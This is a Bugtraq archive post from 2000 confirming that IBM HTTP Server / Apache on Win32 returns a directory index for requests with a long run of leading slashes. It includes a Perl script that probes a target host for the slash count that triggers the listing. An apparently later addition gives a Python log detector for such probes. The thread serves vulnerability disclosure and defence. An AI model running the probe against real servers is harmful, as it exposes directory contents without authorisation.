Bugtraq mailing list archives

Re: IBM HTTP SERVER / APACHE


From: hdm () SECUREAUSTIN COM (H D Moore)
Date: Thu, 1 Jun 2000 09:52:38 -0500


Hi,

I verified this on IBM_HTTP_SERVER/1.3.3 Apache/1.3.4-dev (Win32).  The
number of /'s needed were exactly the same number as Marek stated in his
original email (211 being the key number to retrieve an index listing).
Appended is an example perl script for finding _your_ magic number.  Is
this a bug merely in IBM HTTPD or Apache Win32 in general?  Does IBM set
some odd compile flag which triggers this bug in their version?  Anyone
from the Apache group care to comment?

-HD

http://www.secureaustin.com (spidermap/nlog/etc)

Marek Roy wrote:

I haven't seen any advisories for IBM HTTP SERVER running
Apache.

[ snip ]
The number of "/" used to reproduce this can be different
from one server to another.  I don't have enough time to do
more testing.  However, feel free to add some more info to
this quick advisory.

----[ sample scan script to find / offset ]---- (OMG it's PERL ;)

#!/usr/bin/perl
# Probe for the number of leading "/" characters at which the server's
# response stops matching the normal root page (the "magic number").

use LWP::Simple;
use strict;

my $host = shift() || die "usage:  $0 [hostname]\n";
my $cnt;
my $data;
my $odata;
my $i;

# Baseline: the response for the ordinary root URL.
$odata = get("http://$host/");
if (!defined($odata) || $odata eq "")
{
    die "no response from server:  $host\n";
}
for ($i = 2; $i < 4096; $i++)
{
    print "Trying $i...\n";
    $data = get("http://$host" . ("/" x $i));
    # Stop at the first slash count whose response differs from the baseline.
    if (defined($data) && $data ne $odata)
    {
        print "/ = $i\n\n$data\n\n";
        exit;
    }
}

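As an added example (not from the original post or HD's script), a check an administrator can run over Apache access logs to spot this kind of probe: it flags requests whose path carries an abnormally long run of slashes and records whether the server answered 200. The log lines are constructed in common log format, and the threshold of 8 is an assumption; legitimate paths rarely exceed a doubled slash.

```python
import re
from typing import Dict, List

# Constructed sample lines in Apache common log format (not taken from the post).
# The third line mimics a request with 211 slashes, the count reported for the
# verified server; the fourth is an ordinary doubled slash that should not fire.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [01/Jun/2000:09:52:38 -0500] "GET / HTTP/1.0" 200 1532',
    '10.0.0.5 - - [01/Jun/2000:09:52:39 -0500] "GET /images/logo.gif HTTP/1.0" 200 4096',
    '10.0.0.9 - - [01/Jun/2000:09:53:01 -0500] "GET ' + "/" * 211 + ' HTTP/1.0" 200 8822',
    '10.0.0.9 - - [01/Jun/2000:09:53:02 -0500] "GET /cgi-bin//status HTTP/1.0" 404 210',
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)


def longest_slash_run(path: str) -> int:
    """Length of the longest run of consecutive '/' characters in a request path."""
    return max((len(run) for run in re.findall(r"/+", path)), default=0)


def find_slash_probes(log_text: str, threshold: int = 8) -> List[Dict]:
    """One record per request whose path has a slash run >= threshold (assumed 8).

    A 200 status on such a request means the server handled it instead of
    rejecting it, which is the condition the thread describes.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-CLF line: skip rather than guess
        run = longest_slash_run(m.group("path"))
        if run >= threshold:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "run": run,
                "status": int(m.group("status")),
                "served": m.group("status") == "200",
            })
    return hits


if __name__ == "__main__":
    for hit in find_slash_probes(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} slash run={hit['run']} status={hit['status']}")
```

Because the posted script ramps the slash count up from 2, a per-source tally of flagged requests separates a scan from a one-off malformed URL.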
